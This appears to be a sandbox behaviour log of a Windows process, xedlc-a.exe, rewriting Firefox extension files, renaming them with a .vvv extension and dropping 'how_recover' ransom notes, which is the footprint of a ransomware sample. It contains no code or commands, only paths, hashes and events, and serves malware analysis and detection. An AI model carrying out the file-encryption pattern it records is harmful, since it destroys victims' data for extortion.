- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476270
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72814
- mode: close
- sequenceNumber: 1041
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\test-page-worker.js
- filesize: 1326
- md5sum: 0e353739fad6a16b3f960e8d2fe30d5b
- sha1sum: 3f323b39ec56d8cbee1a2d9930c7cd91b794b31b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476270
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72826
- mode: rename
- sequenceNumber: 1042
- filesize: 1326
- md5sum: 0e353739fad6a16b3f960e8d2fe30d5b
- sha1sum: 3f323b39ec56d8cbee1a2d9930c7cd91b794b31b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\test-page-worker.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\test-page-worker.js.vvv
- ads:
- fid (ads:): 562949953476270
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72838
- mode: created
- sequenceNumber: 1043
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778331
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72846
- mode: close
- sequenceNumber: 1044
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778331
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72855
- mode: created
- sequenceNumber: 1045
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778332
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72863
- mode: close
- sequenceNumber: 1046
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778332
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72873
- mode: open
- sequenceNumber: 1047
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\clipboard.js
- filesize: 7688
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765868
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 73152
- mode: close
- sequenceNumber: 1048
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\clipboard.js
- filesize: 8110
- md5sum: c40b42787509a45c379254a7c2ebb3d9
- sha1sum: 5039723739019fc9e582f1839765e132dce47029
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765868
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73217
- mode: rename
- sequenceNumber: 1049
- filesize: 8110
- md5sum: c40b42787509a45c379254a7c2ebb3d9
- sha1sum: 5039723739019fc9e582f1839765e132dce47029
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\clipboard.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\clipboard.js.vvv
- ads:
- fid (ads:): 281474976765868
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73312
- mode: open
- sequenceNumber: 1050
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\context-menu.js
- filesize: 42249
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765859
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 73647
- mode: close
- sequenceNumber: 1051
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\context-menu.js
- filesize: 42670
- md5sum: e9ec3c26a2219c6d5605211327745010
- sha1sum: c6aa6761bc99d517289ab1caac4558daac2e9e25
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765859
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73659
- mode: rename
- sequenceNumber: 1052
- filesize: 42670
- md5sum: e9ec3c26a2219c6d5605211327745010
- sha1sum: c6aa6761bc99d517289ab1caac4558daac2e9e25
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\context-menu.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\context-menu.js.vvv
- ads:
- fid (ads:): 281474976765859
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73671
- mode: open
- sequenceNumber: 1053
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\hotkeys.js
- filesize: 2928
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765897
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 73731
- mode: close
- sequenceNumber: 1054
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\hotkeys.js
- filesize: 3358
- md5sum: f67a64cf42cc6da4603e913178821a41
- sha1sum: 90dec1e983793443310d0a30689c42cc14fdb053
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765897
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73746
- mode: rename
- sequenceNumber: 1055
- filesize: 3358
- md5sum: f67a64cf42cc6da4603e913178821a41
- sha1sum: 90dec1e983793443310d0a30689c42cc14fdb053
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\hotkeys.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\hotkeys.js.vvv
- ads:
- fid (ads:): 281474976765897
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73758
- mode: open
- sequenceNumber: 1056
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\notifications.js
- filesize: 3970
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476260
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 73824
- mode: close
- sequenceNumber: 1057
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\notifications.js
- filesize: 4398
- md5sum: f47c7e8e486aad56c891a4b50479ba57
- sha1sum: cd686544fca5dae975e7280d2e279c7bf8b30022
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476260
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73838
- mode: rename
- sequenceNumber: 1058
- filesize: 4398
- md5sum: f47c7e8e486aad56c891a4b50479ba57
- sha1sum: cd686544fca5dae975e7280d2e279c7bf8b30022
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\notifications.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\notifications.js.vvv
- ads:
- fid (ads:): 562949953476260
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73850
- mode: open
- sequenceNumber: 1059
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-mod.js
- filesize: 8111
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765882
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74191
- mode: close
- sequenceNumber: 1060
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-mod.js
- filesize: 8526
- md5sum: a044dd82559a53a5a37973ab9348ae8e
- sha1sum: af4e46496d99d82d9ae283ac1b7a69c016982524
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765882
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74384
- mode: rename
- sequenceNumber: 1061
- filesize: 8526
- md5sum: a044dd82559a53a5a37973ab9348ae8e
- sha1sum: af4e46496d99d82d9ae283ac1b7a69c016982524
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-mod.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-mod.js.vvv
- ads:
- fid (ads:): 281474976765882
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 74393
- repeat: 80
- sequenceNumber: 1062
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 74584
- mode: open
- sequenceNumber: 1063
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-worker.js
- filesize: 3813
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476259
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74595
- mode: close
- sequenceNumber: 1064
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-worker.js
- filesize: 4238
- md5sum: 4d3b9a457453bd4f209883e11d7f737d
- sha1sum: cadf7640ff46ef9f99689173579f83080272e104
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476259
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74611
- mode: rename
- sequenceNumber: 1065
- filesize: 4238
- md5sum: 4d3b9a457453bd4f209883e11d7f737d
- sha1sum: cadf7640ff46ef9f99689173579f83080272e104
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-worker.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-worker.js.vvv
- ads:
- fid (ads:): 562949953476259
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74624
- mode: open
- sequenceNumber: 1066
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\panel.js
- filesize: 13423
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765910
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74782
- mode: close
- sequenceNumber: 1067
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\panel.js
- filesize: 13838
- md5sum: 114ea72d1c604ff1784741956120dc55
- sha1sum: 88e01f7f24bd79355d8a6a53442edc2e3f24952f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765910
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74794
- mode: rename
- sequenceNumber: 1068
- filesize: 13838
- md5sum: 114ea72d1c604ff1784741956120dc55
- sha1sum: 88e01f7f24bd79355d8a6a53442edc2e3f24952f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\panel.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\panel.js.vvv
- ads:
- fid (ads:): 281474976765910
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74806
- mode: open
- sequenceNumber: 1069
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\passwords.js
- filesize: 3318
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765912
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75014
- mode: close
- sequenceNumber: 1070
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\passwords.js
- filesize: 3742
- md5sum: 1118d141da726b1103b8dd3ea0123710
- sha1sum: 82c9aad18bdbcb055d3846a2ce3d6f0be5219c0c
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765912
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75061
- mode: rename
- sequenceNumber: 1071
- filesize: 3742
- md5sum: 1118d141da726b1103b8dd3ea0123710
- sha1sum: 82c9aad18bdbcb055d3846a2ce3d6f0be5219c0c
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\passwords.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\passwords.js.vvv
- ads:
- fid (ads:): 281474976765912
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75073
- mode: open
- sequenceNumber: 1072
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\private-browsing.js
- filesize: 4101
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476277
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75172
- mode: close
- sequenceNumber: 1073
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\private-browsing.js
- filesize: 4526
- md5sum: 6178770a828bfca00956dc8608a99ca6
- sha1sum: b10a4fed6d4cbdc217851c919ab8f2b459c5bc38
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476277
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75185
- mode: rename
- sequenceNumber: 1074
- filesize: 4526
- md5sum: 6178770a828bfca00956dc8608a99ca6
- sha1sum: b10a4fed6d4cbdc217851c919ab8f2b459c5bc38
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\private-browsing.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\private-browsing.js.vvv
- ads:
- fid (ads:): 562949953476277
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75235
- mode: open
- sequenceNumber: 1075
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\request.js
- filesize: 10453
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476248
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75297
- mode: close
- sequenceNumber: 1076
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\request.js
- filesize: 10878
- md5sum: 8b6dd9b2c524beb003a1d941fba7ecaa
- sha1sum: f304c1ab79ac7b89e9e179a9d9b31532fc6f12fe
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476248
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75310
- mode: rename
- sequenceNumber: 1077
- filesize: 10878
- md5sum: 8b6dd9b2c524beb003a1d941fba7ecaa
- sha1sum: f304c1ab79ac7b89e9e179a9d9b31532fc6f12fe
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\request.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\request.js.vvv
- ads:
- fid (ads:): 562949953476248
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75321
- mode: open
- sequenceNumber: 1078
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\selection.js
- filesize: 12316
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476244
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75379
- mode: close
- sequenceNumber: 1079
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\selection.js
- filesize: 12734
- md5sum: 16d08ca5061b1a16ec005c4f0bc5e816
- sha1sum: 022b52698aeb72c3e1f610d3ac34ce0b36a1d5b5
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476244
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75392
- mode: rename
- sequenceNumber: 1080
- filesize: 12734
- md5sum: 16d08ca5061b1a16ec005c4f0bc5e816
- sha1sum: 022b52698aeb72c3e1f610d3ac34ce0b36a1d5b5
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\selection.js
